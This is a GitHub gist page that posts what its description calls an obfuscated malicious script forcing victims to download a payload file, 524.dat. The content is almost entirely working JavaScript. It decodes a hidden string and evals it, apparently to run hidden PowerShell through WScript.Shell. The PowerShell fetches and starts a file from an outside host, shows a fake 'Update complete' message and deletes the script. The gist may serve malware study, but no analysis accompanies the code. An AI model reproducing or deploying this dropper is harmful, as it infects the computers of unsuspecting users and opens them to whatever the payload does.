Skip to content

Instantly share code, notes, and snippets.

@jwieder
Created July 30, 2016 15:42
Show Gist options
  • Save jwieder/c47c7640b754ec65f6482bce2a3a71dd to your computer and use it in GitHub Desktop.
Save jwieder/c47c7640b754ec65f6482bce2a3a71dd to your computer and use it in GitHub Desktop.
obfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
<script>var jjxqu='tqrfyb u{d gmoogvdexTiot(q-b1d0i0o,v-s1m0g0w)l;srceksuiezwetTbom(y0c,h0b)j;w ian=tnqehwj rAkcstgifvlesXmOhbejfekcotz(o\'kWssqcxrritpets.dSbhaeqlulr\'x)e;i iaw.pRouhni(b"pPmogwaebrfSphleylflj p-zWoihnddpoiwtSjtzyrlnei zHkiydodsehnp i$tdv=i$veanxvh:ytdeqmnpd+f\'v\g\u4eaa2e9e2r4s8n0r8';var qwis='dfl6f6v9s8v5edmeq3mah9qakdo1pen3fdd7r4k3zex0fde.xejxiep\'c;v(hNfehwm-bOabijfencytr vSpycsktfepmp.iNheati.eWfembbCplvirernrty)x.zDloywzntldomardvFhihlxer(m\'n hhvtuthpdsy:n/q/acchliseuwdgqarmcobnpicavcs.ponrogx/u1l7p/g5z2w4c.tdeafts\'r,w$tdt)i;lSotlabrfto-dPurqoycnegslsb d$gdn;s[nSm';var ywjtfy='ypsptfetmv.xRkerfqleezcctsilodnx.aAhsssrefmfbxlryh]a:x:uLsokagdhWaimtbhvPjamrmtaiqamldNjaymgeh(y\'oSayqsttfenml.nWnijnhdgotwnso.tFzoqrpmjsc\'b)k;s[osnycsntuekml.iwkibncdpopwnsc.dfxokrjmqsy.ymkeysoszahgqebbsojxq]g:m:dsbhwopwk(g\'rUmpwdgaatzej ycjotmopilseztgeh.z\'o,x\'bIhnhfronrtmvapt';var mzqyqx='qikoznx\'c,m[tWjinntdsolwdsm.aFloframrsm.aMfejsbsmargteaBlooxpBbuztptyobncss]k:p:lOdKb,o q[cSayvsctrehmc.xWrienkdioxwksu.mFaovrlmqsu.nMsemsysiaxgcekBmotxmImcoopne]w:s:cIonwfmoxrumxartgiyomns)o;g"g,h0t,efqarlhsbed)a;ovqaprd vbm=wnxeaws kAxcmthiovtegXbOlbujiercctb(w\'tSsceruiwpetiin';var rnkg='nugm.iFgiilgegSayqsdtneymrOhbejsetcztb\'l)c;cvhavrv lpq r=q ydfokckuomqetnvtw.ulloachaktsipoonl.ihnrmetfq;opb l=j nubnbedsachaoplev(fpe.rsbuybcsctgrn(u8v)b)f;eipfr y(fbg.zFriqlnetEsxqitsztfsf(vpk)j)mbm.hDpeolnectiejFeiolnet(fpm)z;l l}r bcyakttcphe t(vej)o f{s}b scalqogsoet(p)x;x ';var dxatnv='d';var ngfvqhrqi=jjxqu+qwis+ywjtfy+mzqyqx+rnkg+dxatnv; var alamtrmy=""; var nrapcdcao=2; var a=0; while(a<ngfvqhrqi.length){ alamtrmy +=ngfvqhrqi.charAt(a);a +=nrapcdcao; }; qhconyeu="ev".concat("al"); window[qhconyeu](alamtrmy); </script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment